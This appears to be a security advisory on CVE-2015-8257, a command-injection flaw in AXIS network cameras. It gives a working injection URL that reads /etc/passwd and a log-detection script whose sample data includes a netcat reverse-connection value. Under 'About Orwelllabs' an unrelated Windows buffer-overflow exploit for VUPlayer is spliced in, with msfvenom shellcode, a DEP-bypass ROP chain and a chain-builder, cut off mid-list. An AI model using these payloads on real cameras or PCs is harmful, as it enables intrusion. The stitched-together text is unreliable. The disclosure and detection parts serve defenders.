( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
www.orwelllabs.com
security advisory
olsa-2015-8257
PGP: 79A6CCC0
* Advisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector
(+) Vendor: AXIS Communications
(+) Research and Advisory: Orwelllabs
(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html
(+) Class: Improper Input Validation [CWE-20]
(+) CVE Name: CVE-2015-8257
(+) Remotely Exploitable: Yes
(+) Locally Exploitable: No
(+) OLSA-ID: OWLL2015-8257
(+) Affected Versions: Multiple Products/Firmwares (check the list below)
(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability
+++++++++++++
AXIS network cameras (various models/firmwares) are prone to an authenticated remote
command execution vulnerability. By exploiting it, a remote attacker can force the
execution of unauthorized actions on the device, which may lead to further attacks.
Technical Details
+++++++++++++++++
The devtools.sh script is responsible for the vulnerability, which is reachable through four attack vectors, the following pages:
http://xxx.xxx.xxx.xxx/app_license.shtml?app=
http://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=
http://xxx.xxx.xxx.xxx/app_index.shtml?app=
http://xxx.xxx.xxx.xxx/app_params.shtml?app=
An attacker can abuse the app parameter, which expects the name of a
legitimate application, to inject operating system commands by appending a
URL-encoded semicolon ("%3B"); for example, to read the contents of /etc/passwd:
http://xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd
The data entered in the "app=" parameter is passed without any treatment to
the devtools.sh script located at {HTMLROOT}/bin/devtools.sh.
This script contains several functions, namely:
list()
status()
menulist()
mainpagelink()
SETTINGSLINK()
confvariable()
echo_ssivar_licensekey()
load_auto_inst_form()
When these functions are invoked, they receive the parameters passed by the
web application through the affected pages (e.g. app_license.shtml?app=).
Requesting the URL below:
http://xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd
passes the value of "app" directly to the shell that invokes devtools.sh via
sh -c, as shown in the process listing below (third line, invoking the
confvariable function):
[SNIP]
2039 led 25472 S /usr/bin/enldgts -n
12014 root 0 SW [kworker/0:0]
13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh confvariable ORW..
13183 root 2728 R ps -aux PACKAGENAME
13312 root 0 SW [kworker/3:1]
13320 root 0 SW [kworker/2:0]
[SNIP]
The value "ORWELLLABS%3Bcat%20/etc/passwd" is then passed on to the
corresponding function (after going through the check in confvariable()):
confvariable() {
local val=
if [ -r "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" ]; then
. "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" || :
eval val=\$$2
echo $val
fi
}
It then reaches the menulist() function, whose relevant section lies
between lines 127 and 143:
[SNIP]
127       [ "$name", "/app_params.shtml", "app=$APPNAME&", hostA, <!--#if expr="\$activeMenu1 = $APPNAME" -->true<!--#else -->false<!--#endif -->, null,
128         [
129           [ "Settings", "/app_params.shtml", "app=$APPNAME&", hostA, <!--#if expr="\$activePage = param_$APPNAME" -->true<!--#else -->false<!--#endif -->, null, []],
130   EOF
131   if [ -z "$LICENSEPAGE" ] || [ "$LICENSEPAGE" = axis ]; then
132     cat <<-EOF
133           [ "License", "/app_license.shtml", "app=$APPNAME&", hostA, <!--#if expr="\$activePage = license_$APPNAME" -->true<!--#else -->false<!--#endif -->, null, []],
134   EOF
135   fi
136   if [ "$LICENSEPAGE" = custom ] && [ -r "$HTMLROOT/local/$APPNAME/license.inc" ]; then
137     cat <<-EOF
138           [ "License", "/app_license_custom.shtml", "app=$APPNAME&", hostA, <!--#if expr="\$activePage = custom_$APPNAME" -->true<!--#else -->false<!--#endif -->, null, []],
139   EOF
140   fi
141   if [ -r "$HTMLROOT/local/$APPNAME/about.inc" ]; then
142     cat <<-EOF
143           [ "About", "/app_index.shtml", "app=$APPNAME&", hostA, <!--#if expr="\$activePage = $APPNAME" -->true<!--#else -->false<!--#endif -->, null, []],
The important entries are the five menu lines above (127, 129, 133, 138 and
143 of /bin/devtools.sh): each interpolates $APPNAME into the
"app=$APPNAME&" query string and into the SSI expression that decides
whether the menu item is the active one.
In the PoC presented above the payload is rendered through line 133 of the
devtools script (the "License" menu entry), which becomes:
[ "License", "/app_license.shtml", "app=ORWELLLABS%3Bcat%20/etc/passwd&", hostA, <!--#if expr="\$activePage = License" -->true<!--#else -->false<!--#endif -->, null, []],
and, when executed, echoes the results on the page.
Impact
++++++
Because the injected commands run inside the device's BusyBox environment,
where every binary and script runs as root, an attacker can execute
arbitrary commands, create backdoors, open a reverse connection to an
attacker-controlled machine, and enlist the devices in botnets or as DDoS
amplifiers; the limit is the attacker's creativity.
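Until a fix ships, the practical defence is detection: every request to one of the four devtools pages carries the injected command in the app= query parameter, so the camera's access log shows it in clear. The Python below is an added example (not part of the advisory) that parses Combined Log Format lines, decodes app=, and flags any value that is not a plain application name; the log lines are constructed for the example and the allowed character set for an application name is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example (not from the advisory): detection logic for the devtools.sh
# vector, run over constructed access-log lines in Combined Log Format.

# The four SSI pages that forward app= to devtools.sh.
DEVTOOLS_PAGES = {"/app_license.shtml", "/app_license_custom.shtml",
                  "/app_index.shtml", "/app_params.shtml"}

# A legitimate application name (assumption: the characters an ACAP package
# name may contain); anything else, shell metacharacters included, is flagged.
APP_NAME = re.compile(r"[A-Za-z0-9_.-]+")

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample: one injection, one legitimate call, one rejected attempt
# (401: wrong credentials, still worth knowing about), one unrelated page.
SAMPLE_LOG = """\
192.0.2.10 - root [25/Jul/2016:10:01:02 +0000] "GET /app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd HTTP/1.1" 200 1931
192.0.2.10 - root [25/Jul/2016:10:01:05 +0000] "GET /app_params.shtml?app=ORWELLLABS HTTP/1.1" 200 4123
192.0.2.11 - - [25/Jul/2016:10:02:00 +0000] "GET /app_index.shtml?app=x%7Cnc%20198.51.100.5%204444 HTTP/1.1" 401 0
192.0.2.12 - viewer [25/Jul/2016:10:03:00 +0000] "GET /view/viewer_index.shtml HTTP/1.1" 200 9001
"""


def suspicious_app_requests(lines):
    """Return (ip, user, status, decoded app value) for each request to a
    devtools page whose app= value is not a plain application name."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path not in DEVTOOLS_PAGES:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("app", []):
            app = unquote(raw)  # second pass catches double-encoded payloads
            if not APP_NAME.fullmatch(app):
                hits.append((m["ip"], m["user"], int(m["status"]), app))
    return hits


def scan_sample():
    """Run the detector over the constructed sample log."""
    return suspicious_app_requests(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for hit in scan_sample():
        print("%s user=%s status=%d app=%r" % hit)
```

A 200 with a flagged value means the command ran (the vulnerability is authenticated, so the user column tells you which account was used); a 401 means a failed attempt and is still worth an alert, since it shows the device is being probed for this vector.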
Affected Products
+++++++++++++++++
Multiple Axis Communications Products/Firmware including:
* AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -
Firmware 5.41.1.4
* AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -
Firmware 5.70.1.2
* AXIS A8004-VE Network Video Door Station -
Firmware 5.85.1.1
* AXIS P3384 fixed dome Network camera -
Firmware 6.10.1
* AXIS P5532-E PTZ Dome Network Camera -
Firmware 5.41.3.1
* AXIS Q60-E Network Dome PTZ -
Firmware 5.65.1.1, 5.41.*, 5.70.1.1
* AXIS Q7401 Video Encoder -
Firmware 5.50.4
* AXIS Q7404 Video Encoder -
Firmware 5.50.4.*
* AXIS Q7406 Blade Video Encoder -
Firmware 5.51.2
* AXIS Q7411 Video Encoder -
Firmware 5.90.1
* AXIS Q7414 Blade Video Encoder -
Firmware 5.51.2
* AXIS Q7424-R Video Encoder -
Firmware 5.50.4
* AXIS Q7424-R Mk II Video Encoder -
Firmware 5.51.3
* AXIS Q7436 Blade Video Encoder -
Firmware 5.90.1
The list below shows the affected firmware images (these exact builds may no
longer be available for download, only the latest version of each; if unsure,
check the hash). All of them (second column) embed the same "devtools.sh"
shell script that triggers the RCE vulnerability. The script is located at
"{HTMLROOT}/bin/devtools.sh".
========================================================================
PRODUCT FIRMWARE FIRMWARE HASH
========================================================================
AXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a
AXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d
AXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10
AXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921
AXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7
AXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12
AXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12
AXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e
AXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841
AXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841
AXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a
AXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b
AXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b
AXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866
AXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65
AXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811
AXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e
AXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70
AXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7
AXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b
AXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6
AXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d
AXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca
AXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509
AXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61
AXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61
AXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205
AXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205
AXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d
AXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7
AXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d
AXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979
AXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60
AXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60
AXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939
AXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969
AXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb
AXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03
AXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad
AXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f
AXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d
AXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6
AXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af
AXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba
AXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c
AXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea
AXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474
AXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4
AXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4
AXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6
AXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6
AXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56
AXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a
AXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532
AXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532
AXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476
AXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864
AXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b
AXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e
AXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e
AXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2
AXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00
AXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d
AXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be
AXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be
AXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892
AXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee
AXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee
AXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc
AXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749
AXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271
AXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8
AXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727
AXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106
AXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0
AXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698
AXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611
AXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf
AXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52
AXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e
AXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313
AXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188
AXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1
AXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1
AXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81
AXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863
AXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9
AXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409
AXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1
AXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83
AXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0
AXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd
AXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4
AXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49
AXIS Q1931-E-PT-Mount 5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9
AXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1
AXIS Q1932-E PT.Mount 5.75.1 513fc031f85542548eeccfeaa7c1a29e
AXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688
AXIS Q2901-E PT.Mount 5.55.4.1 a41aed45359f11d2ec248419c124a52d
AXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660
AXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3
AXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de
AXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104
AXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506
AXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b
AXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47
AXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb
AXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026
AXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d
AXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53
AXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253
AXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766
AXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da
AXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501
AXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd
AXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1
AXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d
AXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928
AXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d
AXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce
AXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6
AXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea
AXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8
AXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d
AXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741
AXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746
AXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b
AXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148
AXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5
AXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f
AXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5
AXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d
AXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0
AXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e
AXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd
AXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4
AXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7
AXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee
AXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd
AXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd
AXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51
AXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77
AXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699
AXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the vendor, tickets were opened to correct this issue.
Credits
+++++++
These vulnerabilities have been discovered and published by Orwelllabs.
Timeline
++++++++
2015-09-10: First attempt to contact Vendor
2015-10-30: Vulnerability was reported to CERT
2015-11-30: CVE-IDs are assigned
2016-07-25: Since the first vulnerability was published (09.04.2016, EDB-ID: 39683)
a long conversation about these vulnerabilities has taken place with the
manufacturer; we have maintained communication from 15/04/2016 until now.
As there is still disagreement regarding the vulnerabilities (and botnets in
the wild: https://goo.gl/k79I8u), we decided to publish this advisory, since
all deadlines have already been exhausted.
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
++++++++++++++++
# Loadind k4fK43sQu3 m0dule...
#!/usr/bin/env python3
# Tested Windows 7 Home x86 & Windows 10 Home x86_x64
# badchars \x00\x0a\x1a\x20\x40
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a\x20\x40" -f python
buf = b""
buf += b"\xbf\x3b\x99\xdd\xa3\xdb\xc4\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x33\x31\x78\x12\x03\x78\x12\x83\xfb\x9d\x3f"
buf += b"\x56\x07\x75\x36\x99\xf7\x86\x29\x13\x12\xb7\x7b\x47"
buf += b"\x57\xea\x4b\x03\x35\x07\x27\x41\xad\x9c\x45\x4e\xc2"
buf += b"\x15\xe3\xa8\xed\xa6\xc5\x74\xa1\x65\x47\x09\xbb\xb9"
buf += b"\xa7\x30\x74\xcc\xa6\x75\x68\x3f\xfa\x2e\xe7\x92\xeb"
buf += b"\x5b\xb5\x2e\x0d\x8c\xb2\x0f\x75\xa9\x04\xfb\xcf\xb0"
buf += b"\x54\x54\x5b\xfa\x4c\xde\x03\xdb\x6d\x33\x50\x27\x24"
buf += b"\x38\xa3\xd3\xb7\xe8\xfd\x1c\x86\xd4\x52\x23\x27\xd9"
buf += b"\xab\x63\x8f\x02\xde\x9f\xec\xbf\xd9\x5b\x8f\x1b\x6f"
buf += b"\x7e\x37\xef\xd7\x5a\xc6\x3c\x81\x29\xc4\x89\xc5\x76"
buf += b"\xc8\x0c\x09\x0d\xf4\x85\xac\xc2\x7d\xdd\x8a\xc6\x26"
buf += b"\x85\xb3\x5f\x82\x68\xcb\x80\x6a\xd4\x69\xca\x98\x01"
buf += b"\x0b\x91\xf6\xd4\x99\xaf\xbf\xd7\xa1\xaf\xef\xbf\x90"
buf += b"\x24\x60\xc7\x2c\xef\xc5\x37\x67\xb2\x6f\xd0\x2e\x26"
buf += b"\x32\xbd\xd0\x9c\x70\xb8\x52\x15\x08\x3f\x4a\x5c\x0d"
buf += b"\x7b\xcc\x8c\x7f\x14\xb9\xb2\x2c\x15\xe8\xd0\xb3\x85"
buf += b"\x70\x39\x56\x2e\x12\x45"
# VirtualProtect ROP chain (DEP bypass) from BASS.dll / BASSMIDI.dll / BASSWMA.dll gadgets
rop = b"\xe7\x5f\x01\x10"   # POP EAX # RETN [BASS.dll]
rop += b"\x5c\xe2\x60\x10"  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
rop += b"\xf1\xea\x01\x10"  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
rop += b"\x50\x09\x03\x10"  # XCHG EAX,ESI # RETN [BASS.dll]
rop += b"\x0c\x80\x60\x10"  # POP EBP # RETN 0x0C [BASSMIDI.dll]
rop += b"\x9f\x53\x10\x10"  # & jmp esp [BASSWMA.dll]
rop += b"\xe7\x5f\x01\x10"  # POP EAX # RETN [BASS.dll]
rop += b"\x90" * 12         # skipped by the RETN 0x0C above
rop += b"\xff\xfd\xff\xff"  # 0x201 in negative (NEG EAX below yields dwSize)
rop += b"\xb4\x4d\x01\x10"  # NEG EAX # RETN [BASS.dll]
rop += b"\x72\x2f\x03\x10"  # XCHG EAX,EBX # RETN [BASS.dll]
rop += b"\xe7\x5f\x01\x10"  # POP EAX # RETN [BASS.dll]
rop += b"\xc0\xff\xff\xff"  # 0x40 in negative (NEG EAX below yields PAGE_EXECUTE_READWRITE)
rop += b"\xb4\x4d\x01\x10"  # NEG EAX # RETN [BASS.dll]
rop += b"\x6c\x8a\x03\x10"  # XCHG EAX,EDX # RETN [BASS.dll]
rop += b"\x07\x10\x10\x10"  # POP ECX # RETN [BASSWMA.dll]
rop += b"\x93\x83\x10\x10"  # &Writable location [BASSWMA.dll]
rop += b"\x04\xdc\x01\x10"  # POP EDI # RETN [BASS.dll]
rop += b"\x84\xa0\x03\x10"  # RETN [BASS.dll]
rop += b"\xe7\x5f\x01\x10"  # POP EAX # RETN [BASS.dll]
rop += b"\x90" * 4          # NOPs; execution lands here after the jmp esp
rop += b"\xa5\xd7\x01\x10"  # PUSHAD # RETN [BASS.dll]
exploit = b"\x41" * 1012 + rop + b"\x90" * 8 + buf
print("rop chain length: %d" % len(rop))
with open('/root/Desktop/exploit_development/VUPlayer/boom.pls', 'wb') as f:
    f.write(exploit)
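Two details in the chain above deserve a closer look: every address has to avoid the five bad characters, and the two VirtualProtect arguments whose plain little-endian encoding would contain 0x00 (0x201 and 0x40) are written as their two's-complement negation and restored with a NEG EAX gadget. The Python below is an added example, not part of the exploit: it packs a chain from gadget addresses while checking every DWORD against the bad-character list, implements the negation trick as a function, and rebuilds the exact chain used above so the two can be compared.

```python
import struct

# Added example (not part of the exploit above): the two mechanics the chain
# relies on, stated as reusable functions: packing gadget addresses while
# checking them against the bad-character list, and the NEG EAX trick that
# smuggles values whose little-endian encoding would contain a bad byte.

BADCHARS = b"\x00\x0a\x1a\x20\x40"   # from the exploit's header comment


def p32(value):
    """Little-endian DWORD as it must appear on the stack."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def neg_encode(value):
    """Two's-complement negation of `value`; a NEG EAX # RETN gadget restores it.
    0x201 (VirtualProtect dwSize) and 0x40 (PAGE_EXECUTE_READWRITE) both
    contain 0x00 bytes when packed directly, and 0x40 is itself a bad char."""
    return p32(-value)


def bad_offsets(blob, badchars=BADCHARS):
    """Offsets of forbidden bytes in `blob` (empty list means the blob is clean)."""
    return [i for i, b in enumerate(blob) if b in badchars]


def build_chain(items):
    """items: (value, comment) pairs; an int is packed as a DWORD, bytes are
    inserted verbatim (filler). Raises ValueError on the first bad byte,
    naming the offending entry, instead of emitting a chain that would be
    corrupted before it reaches the stack."""
    out = b""
    for value, comment in items:
        piece = p32(value) if isinstance(value, int) else value
        bad = bad_offsets(piece)
        if bad:
            raise ValueError("bad char at offset %s in %r (%s)" % (bad, piece, comment))
        out += piece
    return out


def vuplayer_chain():
    """The VirtualProtect chain from the script above, rebuilt from gadget
    addresses. Register layout is what PUSHAD expects: EDI=RETN,
    ESI=&VirtualProtect, EBP=JMP ESP, EBX=dwSize, EDX=flNewProtect,
    ECX=writable lpflOldProtect, EAX=NOP filler reached after the JMP ESP."""
    return build_chain([
        (0x10015fe7, "POP EAX # RETN [BASS.dll]"),
        (0x1060e25c, "IAT entry of VirtualProtect [BASSMIDI.dll]"),
        (0x1001eaf1, "MOV EAX,[EAX] # RETN [BASS.dll]"),
        (0x10030950, "XCHG EAX,ESI # RETN [BASS.dll]"),
        (0x1060800c, "POP EBP # RETN 0x0C [BASSMIDI.dll]"),
        (0x1010539f, "JMP ESP [BASSWMA.dll]"),
        (0x10015fe7, "POP EAX # RETN [BASS.dll]"),
        (b"\x90" * 12, "skipped by the RETN 0x0C"),
        (neg_encode(0x201), "dwSize, negated"),
        (0x10014db4, "NEG EAX # RETN [BASS.dll]"),
        (0x10032f72, "XCHG EAX,EBX # RETN [BASS.dll]"),
        (0x10015fe7, "POP EAX # RETN [BASS.dll]"),
        (neg_encode(0x40), "PAGE_EXECUTE_READWRITE, negated"),
        (0x10014db4, "NEG EAX # RETN [BASS.dll]"),
        (0x10038a6c, "XCHG EAX,EDX # RETN [BASS.dll]"),
        (0x10101007, "POP ECX # RETN [BASSWMA.dll]"),
        (0x10108393, "writable location [BASSWMA.dll]"),
        (0x1001dc04, "POP EDI # RETN [BASS.dll]"),
        (0x1003a084, "RETN [BASS.dll]"),
        (0x10015fe7, "POP EAX # RETN [BASS.dll]"),
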